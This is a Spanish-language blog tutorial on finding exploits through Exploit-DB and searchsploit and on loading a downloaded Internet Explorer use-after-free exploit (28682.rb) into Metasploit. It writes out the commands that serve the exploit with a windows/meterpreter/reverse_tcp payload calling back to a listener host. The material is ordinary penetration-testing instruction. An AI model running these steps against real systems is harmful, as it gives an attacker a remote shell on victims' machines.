Hola Amigos.
En este post vamos a ver cómo podemos
conseguir exploits que no están en nuestro metasploit.
En primer lugar, nos vamos a la web de
exploitdb https://www.exploit-db.com
Tenemos la opción de buscar los tipos
de exploit.
En el apartado shellcode nos
encontramos las shells para los distintos S.O.
Podemos ver también distintos papers
sobre seguridad, en la opción con el mismo nombre.
Con la opción Google Hacking Database
podemos buscar dorks para google.
Vamos a usar el siguiente exploit
remoto para android
Como podéis ver, tenemos el código
CVE-2016-3861. Los códigos CVE identifican cada una de las
vulnerabilidades de manera única, así podemos buscar una
vulnerabilidad concreta con su respectivo código CVE.
El código CVE está compuesto de
CVE-AÑO_DESCUBRIMIENTO-Nº_IDENTIFICATIVO
En la pestaña buscar, podemos buscar
exploits concretos,, vamos a buscar exploits para windows 7.
Si no queremos demostrar que no somos
robots con los captchas, nos podemos descargar la aplicación
actualizada (aunque ya la tiene kali, pero es mejor descargarla) de
Esta versión se actualiza cada semana,
para ello, hay que actualizarla:
./searchsploit -u
Con la opción -w nos muestra los
exploits de la página exploitdb con su respectivo enlace
Cada uno de los exploits están en su
código fuente, por lo que, tras descargarlos, habría que
compilarlos si fuese necesario.
Para evitar que los script kiddies que
se creen que los saben todo hagan el tonto con los exploits, los
desarrolladores suelen poner errores en el código, así que lo más
seguro es que haya que editarlo y corregirlo, y por supuesto,
compilarlo.
En algunos casos, si están en ruby,
podemos añadirlos a metasploit.
Nos descargamos el siguiente exploit
Una vez descargados
mv
28682.rb
/usr/share/metasploit-framework/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
Daos cuenta que el directorio principal
de metasploit es /usr/share/metasploit-framework/.
En metasploit lo cargaríamos como
siempre
use
exploit/windows/browser/ie_setmousecapture_uaf
set SRVHOST 192.168.1.134
set SSL true
set URIPATH /
set PAYLOAD
windows/meterpreter/reverse_tcp
set LHOST 192.168.1.134
exploit
Sígueme en mis redes sociales:
- facebook: facebook.com/Manugomez1977
- twitter manugomez1977
- instagram: manugomez1977
Por favor, haz click en la publi para
poder seguir subiendo posts.
Muchas gracias.
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.